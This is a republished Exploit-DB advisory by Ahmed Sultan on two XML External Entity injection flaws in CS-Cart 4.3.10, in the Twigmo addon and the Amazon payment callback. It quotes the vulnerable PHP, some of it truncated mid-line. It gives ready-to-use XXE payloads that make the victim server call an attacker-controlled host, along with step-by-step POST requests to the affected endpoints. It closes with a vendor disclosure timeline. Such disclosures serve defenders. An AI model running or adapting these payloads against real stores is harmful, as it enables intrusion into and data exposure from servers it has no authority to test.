CS-Cart 4.3.10 – XML External Entity Injection

  • 作者: 0x4148
    日期: 2016-11-16
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/40770/
  • # Software : CS-Cart <= 4.3.10
    # Vendor home : cs-cart.com
    # Author : Ahmed Sultan (@0x4148)
    # Home : 0x4148.com
    # Email : 0x4148@gmail.com
    # Tested on : apache on windoes with php 5.4.4 / apache on linux with php <5.2.17
    From vendor site
    CS-Cart is an impressive platform for users to any level of eCommerce
    With loads of features at a great price, CS-Cart is a great shopping cart
    solution that will quickly enable your online store to do business.
    XXE I : Twimgo addon
    Line 131
    public static function parseDocument($data, $format =
    if ($format == 'xml') {
    $result = @simplexml_load_string($data, 'SimpleXMLElement',
    return self::getObjectAsArray($result);
    } elseif ($format == 'jsonp') {
    return (array) json_decode($data, true);
    } elseif ($format == 'json') {
    return (array) json_decode($data, true);
    return false;
    <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM 'http://YOUR_HOST/0x4148.jnk' >]>
    <Author>Ahmed sultan (0x4148)</Author>
    echo rawurlencode(base64_encode($xml));
    change YOUR_HOST to your server address , use the output in the following
    POST request
    Action -> HOST/cs-cart/index.php?dispatch=twigmo.post
    Data -> action=add_to_cart&data=DATA_OUT_PUT_HERE&format=xml
    a GET request will be sent to your webserver from the vulnerable host
    indicating successful attack
    (Require twimgo addon to be activated)
    XXE II : Amazon payment
    File : app/payments/amazon/amazon_callback.php
    Line 16
    use Tygh\Registry;
    if (!defined('BOOTSTRAP')) { die('Access denied'); }
    include_once (Registry::get('config.dir.payments') .
    fn_define('AMAZON_ORDER_DATA', 'Z');
    if (!empty($_POST['order-calculations-request'])) {
    $xml_response = $_POST['order-calculations-request'];
    } elseif (!empty($_POST['NotificationData'])) {
    $xml_response = $_POST['NotificationData'];
    if (!empty($_POST['order-calculations-error'])) {
    // Process the Amazon callback error
    $xml_error = $_POST['order-calculations-error'];
    $xml = @simplexml_load_string($xml_error);
    if (empty($xml)) {
    $xml = @simplexml_load_string(stripslashes($xml_error));
    // Get error message
    $code = (string) $xml->OrderCalculationsErrorCode;
    $message = (string) $xml->OrderCalculationsErrorMessage;
    sending POST request to
    setting POST parameter order-calculations-request to
    <?xml version='1.0'?>
    <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://host/amazon.jnk" >]>
    <Author>Ahmed sultan (0x4148)</Author>
    Will result in an GET request to your host from the vulnerable machine ,
    indicating successful attack
    (Require amazon payment method to be activated)
    Disclosure time line
    10/11 vulnerabilities reported to the vendor
    11/11 Vendor asked for extra details
    12/11 Vendor acknowledged the validity of vulnerabilities and asked for
    time to fix
    16/11 vendor permitted public release